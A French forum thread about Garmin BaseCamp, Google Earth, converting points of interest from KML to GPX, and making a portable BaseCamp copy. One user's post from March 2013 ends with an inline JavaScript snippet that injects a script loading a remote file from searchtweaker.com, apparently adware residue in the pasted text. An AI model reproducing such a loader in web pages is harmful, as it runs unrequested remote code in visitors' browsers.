|
| | |
Auteur | Message |
---|
Mac Cany Globe-Surfeur "Or" (niv 6)
7341
| Sujet: Re: BASECAMP et Google Earth Mer 22 Aoû 2012 - 8:58 | |
| Je suis resté avec un entrée de gamme l'Etrex 10 car le H n'existe plus et cela me suffit mais ce petit GPS est vendu avec cette carte non modifiable , pas remplaçable , pas annulable et tellement succincte et apparemment fausse que cela en est ridicule , il n'y a qu'a voir la différence entre les 2 images postées plus haut car je n'ai fait que basculer d'une carte à l'autre .
Mes waypoints , traces et routes que j'avais sauvegardées semblent bien en place et même d'après la doc devraient être plus juste mais c'est la carte qui ne l'est pas , dessinée et posée grossièrement .
Autre chose , j'ai du mal à me servir de la règle de Basecamp et j'ai mis du temps à m’apercevoir que la distance et la direction sont donnée en bas à gauche de l'écran , pas pratique à mon gout . |
| |
| | Pierre Globe-Surfeur "Or" (niv 3)
3210 vosges
| Sujet: Re: BASECAMP et Google Earth Mer 22 Aoû 2012 - 14:26 | |
| - Mac Cany a écrit:
- .......
Autre chose , j'ai du mal à me servir de la règle de Basecamp et j'ai mis du temps à m’apercevoir que la distance et la direction sont donnée en bas à gauche de l'écran , pas pratique à mon gout . Basecamp n'est pas à mon sens le meilleur des services pour Garmin J'utilise peu Basecamp, je lui préfère le service Mapsource Le seul avantage de Basecamp me semble être la possibilité de dévérouiller directement l'affichage de certaines cartes. |
| |
| | dlv41001 Nouveau
3 58 Blois, France
| Sujet: Re: BASECAMP et Google Earth Sam 30 Mar 2013 - 13:16 | |
| Bonjour,
première utilisation du forum donc excusez-moi par avance si je ne fais pas les choses dans l'ordre. Cela concerne le logiciel BaseCamp et Google Earth. Existe-t-il une méthode pour récupérer tous les points d’intérêt que j'ai sous GE. Bien sur, comme je suis ordonné, l'architecture est assez conséquente. Est-il possible de les transférer dans mon GPS Nüvi 2595 ou sous BaseCamp. Si oui, sous quelle forme ? |
| |
| | Mac Cany Globe-Surfeur "Or" (niv 6)
7341
| Sujet: Re: BASECAMP et Google Earth Sam 30 Mar 2013 - 17:59 | |
| Salut
Si le dossier ou sont tes points d’intérêts est volumineux je te conseille de le scinder en 2 ou 3 parties ( par ordre d’intérêt ) pour une histoire de place mémoire de ton GPS , puis de le ou les sauvegarder dans un dossier . Télécharger ITN converter ( gratuit ) puis avec celui-ci aller chercher le ou un des fichiers KLM que tu as sauvegardé précédemment et de le convertir au format de ton GPS , il me semble qu'il y a une option pour Garmin Nüvi mais il a des chances que ce soit au format GPX . Ensuite tu peux envoyer ( exporter ) les données au GPS , toujours avec ITN converter , et aussi sauvegarder ces données aux format GPX pour les lire avec BaseCamp . ATTENTION tes repères dans GE vont devenir des waypoints pour ton GPS , regardes combien de lettres/chiffres tu peux mettre pour nommer un waypoint dans ton GPS , les noms de tes repères dans GE ne devra pas dépasser ce nombre sous risque de plantage . |
| |
3210 vosges
| Sujet: Re: BASECAMP et Google Earth Sam 30 Mar 2013 - 22:36 | |
| - dlv41001 a écrit:
- Bonjour,
première utilisation du forum donc excusez-moi par avance si je ne fais pas les choses dans l'ordre. Cela concerne le logiciel BaseCamp et Google Earth. Existe-t-il une méthode pour récupérer tous les points d’intérêt que j'ai sous GE. Bien sur, comme je suis ordonné, l'architecture est assez conséquente. Est-il possible de les transférer dans mon GPS Nüvi 2595 ou sous BaseCamp. Si oui, sous quelle forme ? Bonsoir dlv41001 Si tu recherches simplement le transfert vers un GPS Nüvi, il n'y a aucune obligation à passer par BaseCamp Faire une sauvegarde de tes POI's sous le format GPX dans un dossier indépendant puis effectuer ensuite le transfert avec l'outil gratuit PoiLoader Le téléchargement des POI's peut se faire directement sur ton GPS ou sur une carte SD Autre avantage : cet outil permet aussi la création des alertes sonores......... Ce truc fonctionne parfaitement |
| |
| | dlv41001 Nouveau
3 58 Blois, France
| Sujet: Format GPX ? Dim 31 Mar 2013 - 12:42 | |
| :Bonjour Pierre, merci beaucoup pour ces infos par contre, lorsque je clique sur mon dossier BaseCamp dans GE, celui-ci ne me propose qu'une sauvegarde au format kmz ou kml. Comment fait-on pour avoir le format gpx ? est-ce un module complémentaire à télécharger ou des options à déverrouiller ? Est-ce que dans GE, tous mes WP doivent-ils être sous la racine ou bien le système accepte-t-il les répertoires et sous répertoires ? En ce qui concerne POILoader, je l'ai déjà donc de ce coté là pas de pb. Dominique - Pierre a écrit:
- dlv41001 a écrit:
- Bonjour,
première utilisation du forum donc excusez-moi par avance si je ne fais pas les choses dans l'ordre. Cela concerne le logiciel BaseCamp et Google Earth. Existe-t-il une méthode pour récupérer tous les points d’intérêt que j'ai sous GE. Bien sur, comme je suis ordonné, l'architecture est assez conséquente. Est-il possible de les transférer dans mon GPS Nüvi 2595 ou sous BaseCamp. Si oui, sous quelle forme ? Bonsoir dlv41001
Si tu recherches simplement le transfert vers un GPS Nüvi, il n'y a aucune obligation à passer par BaseCamp
Faire une sauvegarde de tes POI's sous le format GPX dans un dossier indépendant puis effectuer ensuite le transfert avec l'outil gratuit PoiLoader
Le téléchargement des POI's peut se faire directement sur ton GPS ou sur une carte SD
Autre avantage : cet outil permet aussi la création des alertes sonores.........
Ce truc fonctionne parfaitement (function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="http://www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})(); |
| |
3210 vosges
| Sujet: Re: BASECAMP et Google Earth Lun 1 Avr 2013 - 12:05 | |
| - dlv41001 a écrit:
- ..............lorsque je clique sur mon dossier BaseCamp dans GE, celui-ci ne me propose qu'une sauvegarde au format kmz ou kml. Comment fait-on pour avoir le format gpx ? est-ce un module complémentaire à télécharger ou des options à déverrouiller ?
............ Bonjour dlv41001 Si je comprends bien ce que tu cherches à faire : tu souhaiterais convertir en format GPX des POI's qui proviennent de BaseCamp lorqu'ils sont affichés sur GE GE ne te proposera bien sûr la sauvegarde que sur des formats KMZ ou KML C'est à partir d'un KML qu'il faut effectuer une conversion (externe à GE) vers le GPX Diverses méthodes sont possibles..... L'outil ITN converter Exemple d'utilisation Voici l'ouverture sur ITV Converter d'un KML provenant de GE avec 176 waypoints sur les mines en Alaska Puis la manip "export file format" pour sa conversion vers le GPX Attention : Le classement des formats proposés n'est pas alphabétique ...... Tu peux aussi utiliser pour ce type de conversion " KML to GPX" d'autres outils comme par exemple : POI EDITOR |
| |
| | dlv41001 Nouveau
3 58 Blois, France
| Sujet: Re: BASECAMP et Google Earth Mar 2 Avr 2013 - 18:01 | |
| Merci Pierre, Vous êtes une 'mine d'Alaska' de renseignements. A force d'essayer, j'avais réussi à transférer sous BaseCamp tous les points d’intérêts que j'ai sous GE. Pas de chance, tous les répertoires ont disparus au profit d'un fichier .kmz et c'est le foutoir... J'ai donc recréé mes répertoires dans BaseCamp et ensuite, j'ai remis au bon endroit les différents POI. Bresf, un vrai bouleau au fond de la mine (d'Alaska). J'ai ensuite exporté les dossiers (via BaseCamp) vers mon GPS et là, bingo. A nouveau le foutoir. Tout cela pour rien. Le GPS n'a récupéré que les listes créées et pas les dossiers dans lesquelles se trouvaient ces listes. Avez-vous une idée lumineuse ? Rien n'est simple dans la vie. Heureusement que GE lui, l'est. Je vais essayer votre méthode mais j'ai des doutes sur le résultat en terme d'architecture des répertoires.
Merci encore Pierre
Dominique
Devise : Pourquoi faire simple quand on peut faire compliqué... |
| |
3210 vosges
| Sujet: Re: BASECAMP et Google Earth Mar 2 Avr 2013 - 19:38 | |
| - dlv41001 a écrit:
- ...........
A force d'essayer, j'avais réussi à transférer sous BaseCamp tous les points d’intérêts que j'ai sous GE. Pas de chance, tous les répertoires ont disparus au profit d'un fichier .kmz et c'est le foutoir... J'ai donc recréé mes répertoires dans BaseCamp et ensuite, j'ai remis au bon endroit les différents POI. Bresf, un vrai bouleau au fond de la mine (d'Alaska). J'ai ensuite exporté les dossiers (via BaseCamp) vers mon GPS et là, bingo. A nouveau le foutoir. Tout cela pour rien.... Bonsoir Dominique Une petite observation basée sur l'expérience : La sauvegarde des POI's, traces et autres Waypoints pour éviter beaucoup de problèmes devrait systematiquement se faire dans des fichiers indépendants des logiciels d'affichage cartographiques Je conserve pour ma part par exemple, plusieurs milliers de KMZ et KML dans des dossiers totalement en dehors de GE et je ne les affiche avec le logiciel que selon les besoins. Les GPX destinés à mon GPS, à MapSource ou à BaseCamp sont encore séparés dans d'autres dossiers C'est vrai que ce classement est fastidieux mais c'est tellement plus sûr en cas de pépin........ De plus tout l'ensemble est placé dans un disque dur externe, une sécurité de plus pour ne pas perdre des centaines d'heures de recherche..... |
| |
| | l'ombre Surfeur (niv 4)
442 71 Paris Joyeux Techniques,Musiques,Nature,
| Sujet: Re: BASECAMP et Google Earth Mer 3 Avr 2013 - 12:55 | |
| je ne me prend jamais la tète avec des kml ,kmz ou gpx bien trop long volumineux et pour le classement je met mes fichiers en (.txt ) surtout je modifie les fichiers en lecture seule et voilou BJ et cerise sur le gateaux plus de place avec un Zip ou Rar |
| |
3210 vosges
| Sujet: Créer votre version PORTABLE du logiciel BaseCamp Lun 10 Fév 2014 - 16:32 | |
| Bonjour à tous Voici une petite combine qui peut être utile à certains d'entre vous Si vous avez déjà installé une première fois BaseCamp sur un ordinateur Il vous est alors très facile de créer à partir de cette installation une version portable de ce logiciel Version portable que vous pourrez ensuite transporter sans aucune autre installation (ni limitation) vers d'autres ordinateurs Ceci peut être particulièrement intéressant si vous rencontrez des difficultés pour accéder à BaseCamp sur certaines machines Pour obtenir cette version portable : Il suffit simplement de copier le répertoire de BaseCamp sur une clé USB Pour enregistrer des cartes (Format GMAP) il faut y ajouter un sous répertoire nommé "Maps" Le répertoire de BaseCamp c'est ceci Le lancement se fait alors sans problème par l'icone Application Ce truc fonctionne de la même façon pour l'autre logiciel cartographique de Garmin : MapSource |
| |
| | Mac Cany Globe-Surfeur "Or" (niv 6)
7341
| Sujet: Re: BASECAMP et Google Earth Lun 10 Fév 2014 - 18:54 | |
| Salut
Très intéressant comme manip , j'ai installé mapsource sur mon PC de bureau et sur mon portable et dsi un jour un des 2 disques durs me lâche je pourrais donc " récupérer " Mapsource pour le réinstaller , merci Pierre ! |
| |
3210 vosges
| Sujet: Re: BASECAMP et Google Earth Lun 10 Fév 2014 - 19:17 | |
| - Mac Cany a écrit:
- Salut
Très intéressant comme manip , j'ai installé mapsource sur mon PC de bureau et sur mon portable et dsi un jour un des 2 disques durs me lâche je pourrais donc " récupérer " Mapsource pour le réinstaller , merci Pierre ! Bonsoir Mac Cany Il faut savoir que Garmin privilégie maintenant BaseCamp par rapport à MapSource Le logiciel MapSource sera donc dans l'avenir complètement obsolète De ce faît, j'ai observé aussi qu'il était maintenant possible d'afficher dans BaseCamp certaines cartes qui ne passaient pas sur MapSource Comme BaseCamp devient de plus en plus utile, j'ai donc pensé qu'il était temps de prendre certaines précautions via des versions portables........ |
| |
| | Contenu sponsorisé
| Sujet: Re: BASECAMP et Google Earth | |
| |
| |
| | |
| |
| | |
| Sujets similaires | |
|
Page 2 sur 2 | Aller à la page : 1, 2 | |
| Permission de ce forum: | Vous ne pouvez pas répondre aux sujets dans ce forum
| |
| |
| |
| |